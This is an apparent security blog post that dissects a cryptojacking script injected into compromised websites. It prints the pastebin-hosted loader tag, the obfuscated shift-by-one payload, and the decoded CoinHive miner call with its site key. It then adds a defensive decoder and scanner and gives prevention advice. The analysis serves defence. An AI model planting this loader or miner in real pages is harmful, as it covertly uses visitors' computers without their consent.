Unfortunately, the combination of weak content management system security and CoinHive has made it easy for attackers to embed cryptocurrency miners into webpages. Using obfuscated code, malware authors insert JavaScript into pages in a way that evades detection.

Browser users can install addons that blacklist access to the CoinHive JavaScript library and the many copies of it that are popping up, but much like antivirus, these merely block known versions.

Example Attack Code Remote Repository:

https://pastebin.com/raw/RNsgLpRs

Use: Embedded into webpages

<script type='text/javascript' src="https://pastebin.com/raw/RNsgLpRs"></script>

Payload:

(function (id){
    var s = "=tdsjqu!tsd>#iuuqt;00dpjoijwf/dpn0mjc0dpjoijwf/njo/kt#?=0tdsjqu?" +
            "=tdsjqu?!wbs!njofs!>!ofx!DpjoIjwf/Bopoznpvt)((-!|!uispuumf;!1/3!" +
            "~*<njofs/tubsu)*<=0tdsjqu?";

    var res = "";
    var stringLength = s.length;
    var flag = false;
    for(var i = 0; i < stringLength; i++){
        if(s.charCodeAt(i) == 40){
            if(flag) continue;
            res += "\'" + id;
            flag = true;
        }
        res += String.fromCharCode(s.charCodeAt(i)-1);
    }
    document.write(res);
})
('i2y4BgTPHv3upoWyw0XCXZRn6RgWnKdw'); // I assume this is here for the attacker's own reference...lol

1) var s holds the main payload string, with every character shifted up by one

2) s.charCodeAt(i)-1 subtracts 1 from each character code of s, producing the Unicode code points of the real payload (the loop also splices the site key into the first '(' it meets, code 40, and drops the second one):

  60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,99,111,105,
110,104,105,118,101,46,99,111,109,47,108,105,98,47,99,111,105,110,104,105,118,101,46,109,
105,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,32,
118,97,114,32,109,105,110,101,114,32,61,32,110,101,119,32,67,111,105,110,72,105,118,101,
46,65,110,111,110,121,109,111,117,115,40,39,39,44,32,123,32,116,104,114,111,116,116,108,
101,58,32,48,46,50,32,125,41,59,109,105,110,101,114,46,115,116,97,114,116,40,41,59,60,47,
115,99,114,105,112,116,62

3) String.fromCharCode() converts those code points back into characters, and document.write() inserts the decoded payload into the page:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script> var miner = new CoinHive.Anonymous('i2y4BgTPHv3upoWyw0XCXZRn6RgWnKdw',
{ throttle: 0.2 });miner.start();</script>
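As an added example (not code from the original post or from CoinHive), the decoding loop above rewritten as a pure function, plus a scanner that looks for the loader in page HTML both in clear text and inside shift-by-one string literals, so the payload can be examined without executing it. The sample page, indicator list and site key placeholder are constructed for the example.

```javascript
'use strict';

// Indicators of the CoinHive loader present in the decoded payload shown on this page.
const INDICATORS = ['coinhive.com/lib/coinhive.min.js', 'CoinHive.Anonymous', 'miner.start()'];

// Reproduce the loader's decoding loop as a pure function: every character code
// is decremented by one; the first '(' (code 40) is replaced by an opening quote
// plus the site key, and the second '(' is dropped (the `continue` in the original).
function decodeShifted(s, siteKey) {
  let res = '';
  let keyInserted = false;
  for (let i = 0; i < s.length; i++) {
    const code = s.charCodeAt(i);
    if (code === 40) {
      if (keyInserted) continue;
      res += "'" + siteKey;
      keyInserted = true;
    }
    res += String.fromCharCode(code - 1);
  }
  return res;
}

// Scan page HTML for the loader both in clear text and inside every quoted JS
// string literal after shift-by-one decoding. Returns one hit per indicator
// found, tagged with the form it was found in.
function scanForMiner(html) {
  const hits = [];
  const check = (text, form) => {
    for (const ind of INDICATORS) {
      if (text.includes(ind)) hits.push({ indicator: ind, form });
    }
  };
  check(html, 'plain');
  const literal = /(["'])((?:(?!\1)[^\\]|\\.)*)\1/g;
  let m;
  while ((m = literal.exec(html)) !== null) check(decodeShifted(m[2], ''), 'shift-1');
  return hits;
}

// Constructed sample: the obfuscated string from the post, embedded in a page the
// way the fetched loader would appear. The site key is a placeholder, not a real key.
const OBFUSCATED = '=tdsjqu!tsd>#iuuqt;00dpjoijwf/dpn0mjc0dpjoijwf/njo/kt#?=0tdsjqu?' +
  '=tdsjqu?!wbs!njofs!>!ofx!DpjoIjwf/Bopoznpvt)((-!|!uispuumf;!1/3!' +
  '~*<njofs/tubsu)*<=0tdsjqu?';
const SAMPLE_PAGE = '<html><body><p>Hello</p><script>(function(id){var s="' + OBFUSCATED +
  '";/* decoding loop as on the page */})("SITE_KEY_PLACEHOLDER");</script></body></html>';

console.log(decodeShifted(OBFUSCATED, 'SITE_KEY_PLACEHOLDER'));
console.log(scanForMiner(SAMPLE_PAGE));
```

Because the scanner decodes every string literal rather than matching the shifted bytes, it also catches copies of the loader that use a different key or a re-spaced payload.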

For browser prevention

For Firefox: Nominer
For Chrome: No Coin

For Website Injection Prevention

To prevent rogue code being injected into your website files, or unauthorised files being added to your Content Management System (CMS) file repository: keep your CMS, themes and plugins up to date, choose themes and plugins carefully, and use a secure web host.

Some security addons, such as Pareto Security, can catch attempts to append code to WordPress files, but none of them are as effective as following the advice above.

  1. W D Thompson says:

    My poor WordPress site has finally been hacked, has all sorts of URLs to a wide variety of spam sites. Any assistance will be appreciated.

  2. LN says:

    I actually prefer CoinHive crypto mining captcha over anti-Tor Google's reCAPTCHA.
    However the background mining is a bit too much. I like the idea though, things are evolving, and it's the site owner's problem letting people XSS it. Activating the miner by clicking a button on a cookie-like notice should be fair. Remember that cookies were considered evil and technically they do use your computer's resources, and both can be abused by the implementer like everything else.
    It's just my point of view: ads and miners both generate a very small amount, so using visitors' CPU power is so useless that it becomes kinda bad, but many devs choose to make things easier for themselves by passing the pain to users using Electron, so it isn't a really new concept, but the purpose is.
